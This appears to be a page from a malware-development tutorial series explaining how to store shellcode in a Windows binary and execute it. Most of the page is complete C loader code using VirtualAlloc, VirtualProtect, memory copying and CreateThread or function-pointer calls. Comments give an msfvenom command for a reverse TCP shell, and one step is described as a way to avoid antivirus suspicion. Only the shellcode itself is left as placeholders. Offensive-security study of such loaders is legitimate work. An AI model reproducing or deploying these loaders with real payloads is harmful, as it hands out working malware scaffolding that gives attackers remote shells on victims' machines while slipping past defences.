Basics - Get detected!

Executing shellcode with Defender off.

PE Format

We are most interested in .text, .data, and .rsrc sections since that is where the payloads will be stored.

Storing payload in .data

Global variables are stored in the .data.

#include<stdio.h>
#include<windows.h>

//msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f c
// Declaring payload as a global variable

unsigned char buf[] = "Enter the shellcode generated by msfvenom here";

int main(){

        // VirtualAlloc returns an address and we store the address in a pointer
	// *exec points to memory space with size of buffer
	// Pointer to an allocated buffer address is the contents of it.
	void *exec = VirtualAlloc(
				0,	//System selects address
				sizeof buf, // Allocates buf size
				MEM_COMMIT, // Allocate commited memory
				PAGE_EXECUTE_READWRITE // Protection =R,W,X
				);
				
	//Copies contents of code into allocated memory "exec"
	memcpy(exec, buf, sizeof buf);
	
	//Calling void fuction pointer to payload buffer to execute it
	((void(*)())exec)();
	
	return 0;
}

If we turn off protection in windows 😛 and execute, we get a reverse shell on our listener.

((void(*)())exec)() What are we doing here?

"exec" contains the memory address of the payload.
To execute the shellcode in memory at address "exec", we need to trigger EIP to point to that address.
Here, "void(*)()" is a pointer to a function returning void and taking no arguments.
- Type is void.
- The function is "(*)".
The shellcode was first of type "unsigned char". We typecast it to "void(*)()".
The right most () call this function such that the EIP points to the address (exec) that contains our shellcode and execute it.

Storing payload in .text

Declaring local variables inside main() will be stored on the stack.

In the code below, instead of giving "Execute" access while allocating the buffer "VirtualAlloc()" for the payload, we will do it in two stages.

First we allocate and give R/W access using VirtualAlloc() and then give R/W/Execute access to the buffer using VirtualProtect().

This is done to be as sneaky as possible since AV's will find it suspicious to see "R/W/X" access in VirualAlloc().

Also, notice that payload runs as a new thread since we use the CreateThread().

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    	DWORD oldprotect = 0;

	// Declaring payload variable in main() gets stored in Stack.
	unsigned char payload[] = "insert_Shellcode_here";

	unsigned int payload_len = sizeof payload;
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to new buffer 
	RtlMoveMemory(exec_mem, payload, payload_len);	// Wrapper around memcpy
	
	// Change the exec_mem protection to Execute
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
	// If all good, run the payload
	if ( rv != 0 ){
		th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
		WaitForSingleObject(th, -1);
	}

	return 0;
}

We can achieve the same by using ((void(*)())exec)().

#include<stdio.h>
#include<windows.h>
#include <stdlib.h>
#include <string.h>

int main(){

	//msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f c
	
	unsigned char payload[] = "insert_shellcode_here";
	void *exec;
	BOOL rv;
	DWORD oldprotect = 0;
	
	// VirtualAlloc returns an address and we store the address in a pointer
	// *exec points to memory space with size of buffer
	// Pointer to an allocated buffer address is the contents of it.
	exec = VirtualAlloc(0, sizeof payload, MEM_COMMIT, PAGE_READWRITE);
	
	// Copies contents of payload into allocated memory "exec"
	// RtlMoveMemory is same as memcpy and is a wrapper around it.
	RtlMoveMemory(exec,	// Destination
		     payload,	// Source
		     sizeof payload);
	
	// Change the memory protection from R/W to Execute R/W.	
	rv = VirtualProtect(exec, sizeof payload, PAGE_EXECUTE_READ, &oldprotect);
	
	// Calling void fuction pointer to opcode buffer to execute it
	((void(*)())exec)();
	return 0;
}

PreviousMalware Dev NextNot so easy to stage!

Last updated 2 years ago